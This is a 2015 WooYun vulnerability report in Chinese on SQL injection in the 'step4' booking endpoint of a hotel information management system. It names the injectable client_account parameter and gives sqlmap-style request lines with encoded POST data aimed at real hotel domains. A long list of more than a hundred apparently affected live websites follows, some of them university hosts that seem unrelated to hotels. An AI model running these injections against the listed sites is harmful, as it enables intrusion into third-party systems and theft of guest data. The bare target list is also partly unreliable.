漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0106935
漏洞标题:问途酒店信息管理系统SQL注入漏洞3(众多案例)
相关厂商:广州市问途信息技术有限公司
漏洞作者: 路人甲
提交时间:2015-04-13 10:39
修复时间:2015-05-28 10:40
公开时间:2015-05-28 10:40
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-28: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
3
详细说明:
注入文件:step4 参数:client_account
案例
"http://www.easelandhotel.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319" --data "client_account=gz_yljr&language=zh-tw&code=¶m=%7B%22order_id%22%3A%221688%22%2C%22fields%22%3A%7B%22title%22%3A%22%E5%85%88%E7%94%9F%22%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22email%22%3A%22test123%40qq.com%22%2C%22mobile%22%3A%2213212321232%22%2C%22phone%22%3A%22%22%2C%22remark%22%3A%22%22%7D%2C%22checkin_guests%22%3A%5B%7B%22id%22%3A0%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22fields%22%3A%7B%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22title%22%3A%22%E5%85%88%E7%94%9F%22%7D%7D%5D%7D" -p client_account
"aihotel.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319" --data "client_account=gz_yljr&language=zh-tw&code=¶m=%7B%22order_id%22%3A%221688%22%2C%22fields%22%3A%7B%22title%22%3A%22%E5%85%88%E7%94%9F%22%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22email%22%3A%22test123%40qq.com%22%2C%22mobile%22%3A%2213212321232%22%2C%22phone%22%3A%22%22%2C%22remark%22%3A%22%22%7D%2C%22checkin_guests%22%3A%5B%7B%22id%22%3A0%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22fields%22%3A%7B%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22title%22%3A%22%E5%85%88%E7%94%9F%22%7D%7D%5D%7D" -p client_account
"baohonghotel.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319" --data "client_account=gz_yljr&language=zh-tw&code=¶m=%7B%22order_id%22%3A%221688%22%2C%22fields%22%3A%7B%22title%22%3A%22%E5%85%88%E7%94%9F%22%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22email%22%3A%22test123%40qq.com%22%2C%22mobile%22%3A%2213212321232%22%2C%22phone%22%3A%22%22%2C%22remark%22%3A%22%22%7D%2C%22checkin_guests%22%3A%5B%7B%22id%22%3A0%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22fields%22%3A%7B%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22title%22%3A%22%E5%85%88%E7%94%9F%22%7D%7D%5D%7D" -p client_account
"baolilai-hotel.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319" --data "client_account=gz_yljr&language=zh-tw&code=¶m=%7B%22order_id%22%3A%221688%22%2C%22fields%22%3A%7B%22title%22%3A%22%E5%85%88%E7%94%9F%22%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22email%22%3A%22test123%40qq.com%22%2C%22mobile%22%3A%2213212321232%22%2C%22phone%22%3A%22%22%2C%22remark%22%3A%22%22%7D%2C%22checkin_guests%22%3A%5B%7B%22id%22%3A0%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22fields%22%3A%7B%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22title%22%3A%22%E5%85%88%E7%94%9F%22%7D%7D%5D%7D" -p client_account
"bmgcn.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319" --data "client_account=gz_yljr&language=zh-tw&code=¶m=%7B%22order_id%22%3A%221688%22%2C%22fields%22%3A%7B%22title%22%3A%22%E5%85%88%E7%94%9F%22%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22email%22%3A%22test123%40qq.com%22%2C%22mobile%22%3A%2213212321232%22%2C%22phone%22%3A%22%22%2C%22remark%22%3A%22%22%7D%2C%22checkin_guests%22%3A%5B%7B%22id%22%3A0%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22fields%22%3A%7B%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22title%22%3A%22%E5%85%88%E7%94%9F%22%7D%7D%5D%7D" -p client_account
"chinameetings.cn/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319" --data "client_account=gz_yljr&language=zh-tw&code=¶m=%7B%22order_id%22%3A%221688%22%2C%22fields%22%3A%7B%22title%22%3A%22%E5%85%88%E7%94%9F%22%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22email%22%3A%22test123%40qq.com%22%2C%22mobile%22%3A%2213212321232%22%2C%22phone%22%3A%22%22%2C%22remark%22%3A%22%22%7D%2C%22checkin_guests%22%3A%5B%7B%22id%22%3A0%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22fields%22%3A%7B%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22title%22%3A%22%E5%85%88%E7%94%9F%22%7D%7D%5D%7D" -p client_account
"dehan.test.dossm.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319" --data "client_account=gz_yljr&language=zh-tw&code=¶m=%7B%22order_id%22%3A%221688%22%2C%22fields%22%3A%7B%22title%22%3A%22%E5%85%88%E7%94%9F%22%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22email%22%3A%22test123%40qq.com%22%2C%22mobile%22%3A%2213212321232%22%2C%22phone%22%3A%22%22%2C%22remark%22%3A%22%22%7D%2C%22checkin_guests%22%3A%5B%7B%22id%22%3A0%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22fields%22%3A%7B%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22title%22%3A%22%E5%85%88%E7%94%9F%22%7D%7D%5D%7D" -p client_account
"devpaytmpl3v15.test.dossm.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319" --data "client_account=gz_yljr&language=zh-tw&code=¶m=%7B%22order_id%22%3A%221688%22%2C%22fields%22%3A%7B%22title%22%3A%22%E5%85%88%E7%94%9F%22%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22email%22%3A%22test123%40qq.com%22%2C%22mobile%22%3A%2213212321232%22%2C%22phone%22%3A%22%22%2C%22remark%22%3A%22%22%7D%2C%22checkin_guests%22%3A%5B%7B%22id%22%3A0%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22fields%22%3A%7B%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22title%22%3A%22%E5%85%88%E7%94%9F%22%7D%7D%5D%7D" -p client_account
"dgdh.test.dossm.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319" --data "client_account=gz_yljr&language=zh-tw&code=¶m=%7B%22order_id%22%3A%221688%22%2C%22fields%22%3A%7B%22title%22%3A%22%E5%85%88%E7%94%9F%22%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22email%22%3A%22test123%40qq.com%22%2C%22mobile%22%3A%2213212321232%22%2C%22phone%22%3A%22%22%2C%22remark%22%3A%22%22%7D%2C%22checkin_guests%22%3A%5B%7B%22id%22%3A0%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22fields%22%3A%7B%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22title%22%3A%22%E5%85%88%E7%94%9F%22%7D%7D%5D%7D" -p client_account
"dggarden.royalhotels.cn/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319" --data "client_account=gz_yljr&language=zh-tw&code=¶m=%7B%22order_id%22%3A%221688%22%2C%22fields%22%3A%7B%22title%22%3A%22%E5%85%88%E7%94%9F%22%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22email%22%3A%22test123%40qq.com%22%2C%22mobile%22%3A%2213212321232%22%2C%22phone%22%3A%22%22%2C%22remark%22%3A%22%22%7D%2C%22checkin_guests%22%3A%5B%7B%22id%22%3A0%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22fields%22%3A%7B%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22title%22%3A%22%E5%85%88%E7%94%9F%22%7D%7D%5D%7D" -p client_account
"dgrhm.group.dossm.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319" --data "client_account=gz_yljr&language=zh-tw&code=¶m=%7B%22order_id%22%3A%221688%22%2C%22fields%22%3A%7B%22title%22%3A%22%E5%85%88%E7%94%9F%22%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22email%22%3A%22test123%40qq.com%22%2C%22mobile%22%3A%2213212321232%22%2C%22phone%22%3A%22%22%2C%22remark%22%3A%22%22%7D%2C%22checkin_guests%22%3A%5B%7B%22id%22%3A0%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22fields%22%3A%7B%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22title%22%3A%22%E5%85%88%E7%94%9F%22%7D%7D%5D%7D" -p client_account
"dzhgz.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319" --data "client_account=gz_yljr&language=zh-tw&code=¶m=%7B%22order_id%22%3A%221688%22%2C%22fields%22%3A%7B%22title%22%3A%22%E5%85%88%E7%94%9F%22%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22email%22%3A%22test123%40qq.com%22%2C%22mobile%22%3A%2213212321232%22%2C%22phone%22%3A%22%22%2C%22remark%22%3A%22%22%7D%2C%22checkin_guests%22%3A%5B%7B%22id%22%3A0%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22fields%22%3A%7B%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22title%22%3A%22%E5%85%88%E7%94%9F%22%7D%7D%5D%7D" -p client_account
"easelandhotel.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319" --data "client_account=gz_yljr&language=zh-tw&code=¶m=%7B%22order_id%22%3A%221688%22%2C%22fields%22%3A%7B%22title%22%3A%22%E5%85%88%E7%94%9F%22%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22email%22%3A%22test123%40qq.com%22%2C%22mobile%22%3A%2213212321232%22%2C%22phone%22%3A%22%22%2C%22remark%22%3A%22%22%7D%2C%22checkin_guests%22%3A%5B%7B%22id%22%3A0%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22fields%22%3A%7B%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22title%22%3A%22%E5%85%88%E7%94%9F%22%7D%7D%5D%7D" -p client_account
"electron.physics.buffalo.edu/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319" --data "client_account=gz_yljr&language=zh-tw&code=¶m=%7B%22order_id%22%3A%221688%22%2C%22fields%22%3A%7B%22title%22%3A%22%E5%85%88%E7%94%9F%22%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22email%22%3A%22test123%40qq.com%22%2C%22mobile%22%3A%2213212321232%22%2C%22phone%22%3A%22%22%2C%22remark%22%3A%22%22%7D%2C%22checkin_guests%22%3A%5B%7B%22id%22%3A0%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22fields%22%3A%7B%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22title%22%3A%22%E5%85%88%E7%94%9F%22%7D%7D%5D%7D" -p client_account
"fhschotel.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319" --data "client_account=gz_yljr&language=zh-tw&code=¶m=%7B%22order_id%22%3A%221688%22%2C%22fields%22%3A%7B%22title%22%3A%22%E5%85%88%E7%94%9F%22%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22email%22%3A%22test123%40qq.com%22%2C%22mobile%22%3A%2213212321232%22%2C%22phone%22%3A%22%22%2C%22remark%22%3A%22%22%7D%2C%22checkin_guests%22%3A%5B%7B%22id%22%3A0%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22fields%22%3A%7B%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22title%22%3A%22%E5%85%88%E7%94%9F%22%7D%7D%5D%7D" -p client_account
"guangzhougdhhotel.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319" --data "client_account=gz_yljr&language=zh-tw&code=¶m=%7B%22order_id%22%3A%221688%22%2C%22fields%22%3A%7B%22title%22%3A%22%E5%85%88%E7%94%9F%22%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22email%22%3A%22test123%40qq.com%22%2C%22mobile%22%3A%2213212321232%22%2C%22phone%22%3A%22%22%2C%22remark%22%3A%22%22%7D%2C%22checkin_guests%22%3A%5B%7B%22id%22%3A0%2C%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22fields%22%3A%7B%22last_name%22%3A%22test123%40qq.com%22%2C%22first_name%22%3A%22test123%40qq.com%22%2C%22title%22%3A%22%E5%85%88%E7%94%9F%22%7D%7D%5D%7D" -p client_account
gzdhhotel.test.dossm.com
horizon.com.cn
horizonsanya.com
hotelsjianguo.com
hotelxianjianguo.com
huangdao.lanhai.cn
huangshan.baronyhotels.com
huaponthotel.com
hy.yingwu.com.cn
hzdzyhotel.test.dossm.com
jianguohotelgz.com
laoshan.lanhai.cn
licheng.lanhai.cn
lxol.com.cn
m.xiyuanhotel.com.cn
m.yfkxhotel.com
mail.resortintime.com
oceanhotel.coscohotels.com
osresort.cn
ouyahotels.com
prgardenhotel.com.cn
qh.tianfuyuan.com
qh.wap.tianfuyuan.com
qianmenhotel.com
resortgp.com
resortintime.com
rmhgz.cn
royalgardenhotel.com.cn
royalmarinaplaza.com
sanya31.com
sanyaliking.com
sci-apartment.com
shizhong.lanhai.cn
sunshinehotel.com
sunshinehotelzjj.com
sxs.resortgp.com
sy.tianfuyuan.com
sy.wap.tianfuyuan.com
szjingdu.com
test.cndhotels.com
test.yeohwahotels.com
tfsunshinehotel.com
tfyg.test.dossm.com
tokaihotel.coscohotels.com
vaya-hotel.cn
wakingtown-hotel.com
wap.skyland-hotel.com
wap.soluxehotel.com
whoyhz.test.dossm.com
wintour.cn
www-gse.berkeley.edu
www.3496666.com
www.aihotel.com
www.baohonghotel.com
www.baolilai-hotel.com
www.baronyhotels.com
www.bllhotel.com
www.bmgcn.com
www.chinameetings.cn
www.cnicc.com
www.colorfuldays-hotel.com
www.coscohotels.cn
www.coscohotels.com
www.coscohotels.com.cn
www.dgeahotel.com
www.dgybhotel.com
www.dzhgz.com
www.dzyhotel.com
www.easelandhotel.com
www.ebdh-hotel.com
www.eco-hotel.com.cn
www.eversunshinehotel.com
www.fcghotel.com
www.fhschotel.com
www.gbvh.com
www.gdhhotels.com
www.gdyutonghotel.com
www.glamorhotel.com
www.goldenhotel.com.cn
www.goldsourcehotel.com
www.guangzhougdhhotel.com
www.guishanhotel.com
www.hainanyataihotel.com
www.harmonahotel.com
www.hebs.asia
www.horizon.com.cn
www.horizoncbs.com
www.horizonsanya.com
www.hotelsjianguo.com
www.huaponthotel.com
www.hwndjd.com
www.jadesea.cn
www.jbstel.com
www.jianguohotelgz.com
www.jianliharmonyhotel.com
www.jindinghotel.cn
www.joyahotel.cn
www.joyahotel.com
www.kuntairoyalhotel.com
www.lndfhotel-sh.com
www.lphotel.cn
www.lyhotspring.com
www.muhaihotel.com
www.oceanhotel.com.cn
www.osresort.cn
www.ouyahotels.com
www.physics.buffalo.edu
www.pinweijiudian.com
www.prgardenhotel.com.cn
www.qianzhouwan.com
www.qsshotel.com
www.ramadaplazagz.com
www.regalia.com.cn
www.resortgp.com
www.resortintime.com
www.rhgresorts.com
www.risinghotel.com
www.royalgardenhotel.com.cn
www.royalhotels.cn
www.royalmarinaplaza.com
www.sanya31.com
www.sanyabarry.com
www.sanyaliking.com
www.sevenraygolf.com
www.shangrilaassociation.org
www.singwood.com.cn
www.soluxehotel.com
www.soluxehotelgz.com
www.sunshinehotel.com
www.sunshinehotels.cn
www.sunshinehotelzjj.com
www.szjingdu.com
www.tfsunshinehotel.com
www.themulian.com
www.tianfuyuan.com
www.vaya-hotel.cn
www.wakingtown-hotel.com
www.wenfenghotel.com
www.wintour.cn
www.wmjh.cn
www.wuzhishanyatai.com
www.wx-hotel.com
www.xianhuamanwu.com
www.xiaoqingmai.com
www.xn--sjqu43axxn38f.com
www.xsfd.com
www.yalongbaygolfclub.com
www.yangshuoholiday.com
www.yfkxhotel.com
www.yhihotel.com
www.yingbinhotel.cn
www.ysdidu.com
www.znhyfd.cn
www.zzghhotel.com
xitangjiudian.com
xiushan.baronyhotels.com
yalongbaygolfclub.com
ysdidu.com
zhaolonghotel.com.cn
前两个丢进sqlmap
漏洞证明:
``
修复方案:
过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)